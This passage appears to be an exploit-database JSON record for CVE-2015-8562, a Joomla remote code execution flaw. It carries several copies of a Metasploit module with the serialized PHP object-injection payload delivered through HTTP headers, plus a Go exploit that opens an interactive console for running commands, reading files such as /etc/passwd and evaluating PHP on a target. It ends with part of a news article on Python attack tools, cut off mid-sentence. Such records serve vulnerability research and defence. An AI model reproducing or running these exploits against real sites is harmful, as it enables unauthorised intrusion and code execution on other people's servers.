PHP version #{res.headers['X-Powered-By']}\")\r\n\r\n if version > Gem::Version.new('5.5.9')\r\n vulnerable = false\r\n elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')\r\n vulnerable = false\r\n elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')\r\n vulnerable = false\r\n else\r\n vulnerable = true\r\n end\r\n elsif rest && rest.include?('+deb')\r\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\r\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\r\n\r\n if version > Gem::Version.new('5.4.45')\r\n vulnerable = false\r\n elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'\r\n vulnerable = false\r\n else\r\n vulnerable = true\r\n end\r\n else\r\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\r\n vulnerable = true if version <= Gem::Version.new('5.4.44')\r\n vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))\r\n vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))\r\n end\r\n\r\n unless vulnerable\r\n vprint_error('This module currently does not work against this PHP version')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })\r\n if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')\r\n joomla_version = res.body.scan(/<version>([\\d\\.]+)<\\/version>/i).flatten.first || ''\r\n unless joomla_version.empty?\r\n vprint_status(\"Detected Joomla version #{joomla_version}\")\r\n return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')\r\n end\r\n end\r\n\r\n res.get_html_meta_elements.each do |element|\r\n if element.attributes['name'] &&\r\n /^generator$/i === element.attributes['name'] &&\r\n element.attributes['content'] &&\r\n /joomla/i === element.attributes['content'].value\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n # gets a random 4 byte UTF-8 character\r\n def get_terminator\r\n # valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF\r\n [rand(0x10000..0x10ffff)].pack('U*')\r\n end\r\n\r\n def get_payload(header_name)\r\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\r\n pre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\r\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\r\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\r\n t1000 = get_terminator\r\n return \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{t1000}\"\r\n end\r\n\r\n def print_status(msg='')\r\n super(\"#{peer} - #{msg}\")\r\n end\r\n\r\n def print_error(msg='')\r\n super(\"#{peer} - #{msg}\")\r\n end\r\n\r\n def exploit\r\n if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false\r\n print_error('Target seems safe, so we will not continue.')\r\n return\r\n end\r\n\r\n print_status(\"Sending payload ...\")\r\n header_name = Rex::Text.rand_text_alpha_upper(5)\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path,\r\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\r\n })\r\n fail_with(Failure::Unknown, 'No response') if res.nil?\r\n session_cookie = res.get_cookies\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path,\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n header_name => Rex::Text.encode_base64(payload.encoded)\r\n }\r\n })\r\n end\r\nend\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24763"}], "metasploit": [{"lastseen": "2019-11-25T20:45:53", "bulletinFamily": "exploit", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n", "modified": "2017-08-29T00:17:58", "published": "2015-12-15T16:37:45", "id": "MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE", "href": "", "type": "metasploit", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\n 'Description' => %q{\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n },\n 'Author'\t=>\n [\n 'Marc-Alexandre Montpas', # discovery\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8562'],\n ['EDB', '38977'], # PoC from Gary\n ['EDB', '39033'], # Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\"\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\n ['URL', 'https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\n 'DisclosureDate' => 'Dec 14 2015',\n 'DefaultTarget' => 0)\n )\n\n register_options(\n [\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\n ])\n\n register_advanced_options(\n [\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\n ])\n end\n\n def check\n res = send_request_cgi({'uri' => target_uri.path })\n\n unless res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n unless res.headers['X-Powered-By']\n vprint_error(\"Unable to determine the PHP version.\")\n return Exploit::CheckCode::Unknown\n end\n\n online = joomla_and_online?\n unless online\n vprint_error(\"Unable to detect joomla on #{target_uri.path}\")\n return Exploit::CheckCode::Safe\n end\n\n php_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\n version = Gem::Version.new(php_version)\n vulnerable = false\n\n # check for ubuntu and debian specific versions. Was fixed in\n # * 5.5.9+dfsg-1ubuntu4.13\n # * 5.3.10-1ubuntu3.20\n # * 5.4.45-0+deb7u1\n # Changelogs (search for CVE-2015-6835 or #70219):\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\n if rest && rest.include?('ubuntu')\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\n vprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.5.9')\n vulnerable = false\n elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')\n vulnerable = false\n elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')\n vulnerable = false\n else\n vulnerable = true\n end\n elsif rest && rest.include?('+deb')\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.4.45')\n vulnerable = false\n elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'\n vulnerable = false\n else\n vulnerable = true\n end\n else\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\n vulnerable = true if version <= Gem::Version.new('5.4.44')\n vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))\n vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))\n end\n\n unless vulnerable\n vprint_error('This module currently does not work against this PHP version')\n return Exploit::CheckCode::Safe\n end\n\n j_version = joomla_version\n unless j_version.nil?\n vprint_status(\"Detected Joomla version #{j_version}\")\n return Exploit::CheckCode::Appears if Gem::Version.new(j_version) < Gem::Version.new('3.4.6')\n end\n\n return Exploit::CheckCode::Detected if online\n\n Exploit::CheckCode::Safe\n end\n\n def get_payload(header_name)\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\n pre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\n return \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{Rex::Text::rand_4byte_utf8}\"\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def exploit\n if check == Exploit::CheckCode::Safe && !datastore['FORCE']\n print_error('Target seems safe, so we will not continue.')\n return\n end\n\n print_status(\"Sending payload ...\")\n header_name = Rex::Text.rand_text_alpha_upper(5)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\n })\n fail_with(Failure::Unknown, 'No response') if res.nil?\n session_cookie = res.get_cookies\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'cookie' => session_cookie,\n 'headers' => {\n header_name => Rex::Text.encode_base64(payload.encoded)\n }\n })\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/joomla_http_header_rce.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:56", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-31T00:00:00", "published": "2015-12-31T00:00:00", "href": "https://packetstormsecurity.com/files/135100/Joomla-3.4.5-Object-Injection.html", "id": "PACKETSTORM:135100", "type": "packetstorm", "title": "Joomla 3.4.5 Object Injection", "sourceData": "`package main \n \n/* \n************************************************************************** \n* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit \n* Exploit Author: Khashayar Fereidani ( http://fereidani.com ) \n* Version: 1.5.x to 3.4.5 \n* CVE : CVE-2015-8562 \n************************************************************************** \n* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE \n* IS ON YOUR OWN RESPONSIBILITY \n************************************************************************** \n* How to run : (you need golang compiler from golang.org) \n* go run exploit.go http://target/path \n* or \n* go build exploit.go \n* ./exploit http://target/path \n************************************************************************** \n* DEMO : \n \n$ ./exploit 192.168.1.113/joomla \n############################################### \n# Joomla Remote Command Execution 0day Exploit \n# Exploited by: Khashayar Fereidani \n# http://fereidani.com \n# Vulnerable Versions: 1.5.x to 3.4.5 \n############################################### \n \nAttacking to http://FILTERED.TLD/joomla/ \nTarget is vulnerable ! \n# Command Line Documentation : \nread FILEPATH read file from FILEPATH \ndir DIRPATH list directory in DIRPATH \nexec COMMAND execute system command \neval phpcode evaluate PHP Code \nhelp display this help \nexit close exploit console \n \n[*] Examples: \nread /etc/passwd \ndir /etc/ \nexec ls -lah \neval include('/etc/passwd') \n \n \nroot@joomla:$ exec uname -a \nLinux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \nroot@joomla:$ \n \n*/ \n \nimport ( \n\"fmt\" \n\"net/http\" \n\"regexp\" \n\"os\" \n\"io/ioutil\" \n\"bytes\" \n\"net/http/cookiejar\" \n\"net/url\" \n\"bufio\" \n\"strings\" \n) \n \n \nvar target string; \n \n \nvar helpString=`# Command Line Documentation : \nread FILEPATH read file from FILEPATH \ndir DIRPATH list directory in DIRPATH \nexec COMMAND execute system command \neval phpcode evaluate PHP Code \nhelp display this help \nexit close exploit console \n \n[*] Examples: \nread /etc/passwd \ndir /etc/ \nexec ls -lah \neval include('/etc/passwd') \n \n` \n \nvar validHttpUrl=regexp.MustCompile(\"^http[s]{0,1}://\") \n \nvar resultRegex=regexp.MustCompile(\"(?sm)iMH3r3=(.*)\") \n \nvar cmdRegex=regexp.MustCompile(\"(\\\\w+)\\\\s(.+)\") \n \nvar newLine=regexp.MustCompile(\"[\\\\n\\\\r]\") \n \nvar client *http.Client \n \nfunc newRequest(command string) *http.Request{ \nvalues:=url.Values{} \nvalues.Set(\"1\",\"echo('iMH3r3=');\"+command+\";\") \n \nreq,err:=http.NewRequest(\"POST\",target,bytes.NewBufferString(values.Encode())) \n \nif err!=nil{ \npanic(err) \n} \n \nreq.Header.Set(\"User-Agent\",`123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:43:\"eval($_POST[1]);JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}`+\"\\xf0\\xfd\\xfd\\xfd\") \nreq.Header.Add(\"Content-Type\", \"application/x-www-form-urlencoded\") \nreturn req \n} \n \n \nfunc escape(str string) string{ \nreturn strings.Replace(str,\"'\",\"\\\\'\",-1) \n} \n \n \nfunc runCommand(command string){ \nres,err:=client.Do(newRequest(command)) \n \nif err!=nil{ \nfmt.Println(err.Error()) \n}else{ \ndefer res.Body.Close() \nresBytes,err:=ioutil.ReadAll(res.Body) \nstr:=string(resBytes) \n \nif err!=nil{ \nfmt.Println(err) \n} \nmatch:=resultRegex.FindStringSubmatch(str) \nif len(match)>0{ \nfmt.Print(match[0][7:]) \n} \n} \n \n} \n \n \nfunc confirm() bool{ \nres,err:=client.Do(newRequest(\"\")) \n \nif err!=nil{ \nfmt.Println(err) \nreturn false \n}else{ \nif res.StatusCode==500{ \nfmt.Println(\"Patched PHP Version :( !\") \nreturn false \n} \ndefer res.Body.Close() \nresBytes,err:=ioutil.ReadAll(res.Body) \nstr:=string(resBytes) \n \nif err!=nil{ \nfmt.Println(err) \n} \nmatch:=resultRegex.FindStringSubmatch(str) \nif len(match)>0{ \nreturn true \n}else{ \nreturn false \n} \n} \n} \n \nfunc main(){ \nfmt.Print(`############################################### \n# Joomla Remote Command Execution 0day Exploit \n# Exploited by: Khashayar Fereidani \n# http://fereidani.com \n# Vulnerable Versions: 1.5.0 to 3.4.5 \n############################################### \n`) \noptions := cookiejar.Options{} \n \njar, err := cookiejar.New(&options) \nif err != nil { \npanic(err) \n} \n \nclient = &http.Client{ \nJar:jar, \n} \n \n \n \nif len(os.Args)<2{ \nfmt.Println(\"Insufficient input , please run ./exploit http://targeturl/path/\") \nreturn \n} \n \ntarget=os.Args[1] \nif(!validHttpUrl.MatchString(target)){ \ntarget=\"http://\"+target \n} \n \nif string(target[len(target)-1])!=\"/\"{ \ntarget+=\"/\" \n} \n \nfmt.Println(\"Attacking to \",target) \n \n \nres,err:=client.Do(newRequest(\"\")) \nif err!=nil{ \nfmt.Println(\"Request Error:\",err) \nreturn \n} \nioutil.ReadAll(res.Body) \nres.Body.Close() \n \nif confirm(){ \nfmt.Println(\"Target is vulnerable !\") \n//runCommand(\"system('ls -la')\") \nstdinreader := bufio.NewReader(os.Stdin) \n \nfmt.Println(helpString) \nfor { \nvar line string \nfmt.Print(\"root@joomla:$ \") \nline,_=stdinreader.ReadString('\\n') \nline=newLine.ReplaceAllString(line,\"\") \nmatch:=cmdRegex.FindStringSubmatch(line) \nif len(match)<3 { \nif (line==\"exit\"){ \nreturn \n} \n \nif !(line==\"help\"){ \nfmt.Println(\"Wrong input !\") \n} \n \nfmt.Println(helpString) \n}else{ \ncmd:=match[1] \ninput:=escape(match[2]) \nswitch cmd { \ncase \"exec\": \nrunCommand(\"system('\"+input+\"')\") \ncase \"read\": \nrunCommand(\"readfile('\"+input+\"')\") \ncase \"dir\": \nrunCommand(\"$a=scandir('\"+input+\"');foreach($a as $v){echo $v.\\\"\\\\n\\\";}\") \ncase \"eval\": \nrunCommand(match[2]) \n} \n} \n} \n}else{ \nfmt.Println(\"Target is not vulnerable!\") \n} \n \n \n} \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135100/joomla345-exec.txt"}, {"lastseen": "2016-12-05T22:25:02", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "href": "https://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.html", "id": "PACKETSTORM:134949", "type": "packetstorm", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution', \n'Description' => %q{ \nJoomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. \nBy storing user supplied headers in the databases session table it's possible to truncate the input \nby sending an UTF-8 character. The custom created payload is then executed once the session is read \nfrom the databse. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. \nIn later versions the deserialisation of invalid session data stops on the first error and the \nexploit will not work. The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and \n5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1. \n}, \n'Author' => \n[ \n'Marc-Alexandre Montpas', # discovery \n'Christian Mehlmauer' # metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-8562'], \n['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'], \n['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'], \n['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'], \n['URL', 'https://bugs.php.net/bug.php?id=70219'] \n], \n'Privileged' => false, \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]], \n'DisclosureDate' => 'Dec 14 2015', \n'DefaultTarget' => 0) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]), \nOptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]]) \n], self.class) \n \nregister_advanced_options( \n[ \nOptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({'uri' => target_uri.path }) \n \nunless res \nvprint_error(\"Connection timed out\") \nreturn Exploit::CheckCode::Unknown \nend \n \nunless res.headers['X-Powered-By'] \nvprint_error(\"Unable to determine the PHP version.\") \nreturn Exploit::CheckCode::Unknown \nend \n \nphp_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || '' \nversion = Gem::Version.new(php_version) \nvulnerable = false \n \n# check for ubuntu and debian specific versions. Was fixed in \n# * 5.5.9+dfsg-1ubuntu4.13 \n# * 5.3.10-1ubuntu3.20 \n# * 5.4.45-0+deb7u1 \n# Changelogs (search for CVE-2015-6835 or #70219): \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog \n# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog \nif rest && rest.include?('ubuntu') \nsub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || '' \nvprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.5.9') \nvulnerable = false \nelsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13') \nvulnerable = false \nelsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20') \nvulnerable = false \nelse \nvulnerable = true \nend \nelsif rest && rest.include?('+deb') \nsub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || '' \nvprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.4.45') \nvulnerable = false \nelsif version == Gem::Version.new('5.4.45') && sub_version != '7u1' \nvulnerable = false \nelse \nvulnerable = true \nend \nelse \nvprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\") \nvulnerable = true if version <= Gem::Version.new('5.4.44') \nvulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28')) \nvulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12')) \nend \n \nunless vulnerable \nvprint_error('This module currently does not work against this PHP version') \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') }) \nif res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>') \njoomla_version = res.body.scan(/<version>([\\d\\.]+)<\\/version>/i).flatten.first || '' \nunless joomla_version.empty? \nvprint_status(\"Detected Joomla version #{joomla_version}\") \nreturn Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6') \nend \nend \n \nres.get_html_meta_elements.each do |element| \nif element.attributes['name'] && \n/^generator$/i === element.attributes['name'] && \nelement.attributes['content'] && \n/joomla/i === element.attributes['content'].value \nreturn Exploit::CheckCode::Detected \nend \nend \n \nExploit::CheckCode::Safe \nend \n \n# gets a random 4 byte UTF-8 character \ndef get_terminator \n# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF \n[rand(0x10000..0x10ffff)].pack('U*') \nend \n \ndef get_payload(header_name) \npre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\" \npre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";' \npay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\" \npost_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}' \nt1000 = get_terminator \nreturn \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{t1000}\" \nend \n \ndef print_status(msg='') \nsuper(\"#{peer} - #{msg}\") \nend \n \ndef print_error(msg='') \nsuper(\"#{peer} - #{msg}\") \nend \n \ndef exploit \nif check == Exploit::CheckCode::Safe && datastore['FORCE'] == false \nprint_error('Target seems safe, so we will not continue.') \nreturn \nend \n \nprint_status(\"Sending payload ...\") \nheader_name = Rex::Text.rand_text_alpha_upper(5) \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => target_uri.path, \n'headers' => { datastore['HEADER'] => get_payload(header_name) } \n}) \nfail_with(Failure::Unknown, 'No response') if res.nil? \nsession_cookie = res.get_cookies \nsend_request_cgi({ \n'method' => 'GET', \n'uri' => target_uri.path, \n'cookie' => session_cookie, \n'headers' => { \nheader_name => Rex::Text.encode_base64(payload.encoded) \n} \n}) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134949/joomla_http_header_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2019-05-30T05:51:00", "bulletinFamily": "info", "description": "Python was recently touted as on track to become the world\u2019s most prevalent coding language, looking to swallow, as it were, the majority of the market share for developers. According to recent analysis, Python\u2019s popularity also extends to black hats.\n\nMirroring [the findings](<https://www.economist.com/graphic-detail/2018/07/26/python-is-becoming-the-worlds-most-popular-coding-language>) around its use by coders overall, Python-based tools were used in up to 77 percent of attacks against sites seen in telemetry from Imperva, between the end of June and mid-September. The data also shows that in over a third of the cases, a Python-based tool was responsible for the majority of daily attacks.\n\n\u201cThese levels, over time, show that Python-based tools are used for both breadth and depth scanning,\u201d Imperva said in its [report](<https://www.imperva.com/blog/2018/09/the-worlds-most-popular-coding-language-happens-to-be-most-hackers-weapon-of-choice/>), released Thursday.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27152230/Python-daily-percentage.png>)\n\nMeanwhile, a survey of GitHub by the firm found that about more than 20 percent of GitHub repositories containing an attack tool or an exploit proof of concept (PoC) are written in Python.\n\n\u201cIn virtually every security-related topic in GitHub, the majority of the repositories are written in Python, including tools such as [w3af](<https://github.com/andresriancho/w3af>), [Sqlmap](<https://github.com/sqlmapproject/sqlmap>) and even the infamous [AutoSploit](<https://arstechnica.com/information-technology/2018/02/threat-or-menace-autosploit-tool-sparks-fears-of-empowered-script-kiddies/>) tool,\u201d Imperva noted.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/09/27152129/Python-clients.png>)\n\nSecurity incidents by client.\n\nIn a look at web clients, Imperva researchers reviewed their data, specifically security incidents, and found that more than 25 percent of the clients seen \u2014 excluding vulnerability scanners \u2013 were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.\n\nThe two most popular Python modules used for web attacks are Urllib and Python Requests, the research found. Use of a new module, Async IO, is just kicking off.\n\nIn addition, Python is used to target specific applications and frameworks like [Struts](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>) and 